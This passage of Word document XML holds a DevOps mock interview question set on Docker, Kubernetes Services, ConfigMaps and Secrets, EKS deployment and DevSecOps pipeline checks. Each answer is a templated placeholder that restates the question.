        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you monitor containerized applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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monitor containerized applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How do you perform logging and troubleshoot errors in Docker/Kubernetes environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logging/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Logging/Troubleshooting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perform logging and troubleshoot errors in Docker/Kubernetes environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Which monitoring tools have you used for Kubernetes, such as Prometheus, ELK, Datadog, or Cloud Monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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monitoring tools have you used for Kubernetes, such as Prometheus, ELK, Datadog, or Cloud Monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 71 - Docker Kubernetes CI/CD DevSecOps Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is the purpose of EXPOSE in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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purpose of EXPOSE in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is RUN used for in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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RUN used for in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you expose a FastAPI application on port 8000 inside a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/FastAPI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expose a FastAPI application on port 8000 inside a Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How does the application code become available inside the Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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the application code become available inside the Docker container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What command starts the application inside the container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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command starts the application inside the container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you publish a Docker container port to the host?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Networking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publish a Docker container port to the host?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is the purpose of docker run -p?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Networking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purpose of docker run -p?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the different types of Kubernetes Services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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the different types of Kubernetes Services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you expose an application externally?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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expose an application externally?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the equivalent of Docker port mapping in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Networking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equivalent of Docker port mapping in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do containerPort, port, and targetPort work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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containerPort, port, and targetPort work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you deploy an application using Kubernetes manifest files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Manifests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Manifests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deploy an application using Kubernetes manifest files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the kubectl apply command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Commands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kubectl apply command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. After pushing an image to ECR, what is the next step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EKS/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the EKS/Deployment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After pushing an image to ECR, what is the next step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How do you update the Deployment manifest with the new image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Deployment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update the Deployment manifest with the new image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. If the latest image is pushed but the pod is still using the old image, how do you refresh it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Deployment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the latest image is pushed but the pod is still using the old image, how do you refresh it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Have you worked on Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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on Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Explain an automated deployment pipeline for a FastAPI application to EKS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/EKS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an automated deployment pipeline for a FastAPI application to EKS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What checks would you perform before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps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checks would you perform before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you perform code formatting, linting, unit testing, vulnerability scanning, secret scanning, and image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps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perform code formatting, linting, unit testing, vulnerability scanning, secret scanning, and image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Where would you push the Docker image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container Registry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Where would you push the Docker image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you deploy the image after pushing it to ECR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/EKS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deploy the image after pushing it to ECR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you automate the deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Automation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automate the deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. What is a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What is stored inside a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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stored inside a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What are Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How do you use Secrets inside a pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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use Secrets inside a pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What is the difference between ConfigMap and Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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ConfigMap and Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How can you expose a service only to users inside your organization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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can you expose a service only to users inside your organization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Without using SSO or RBAC, how would you restrict access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Security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Without using SSO or RBAC, how would you restrict access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Can NetworkPolicy solve this problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
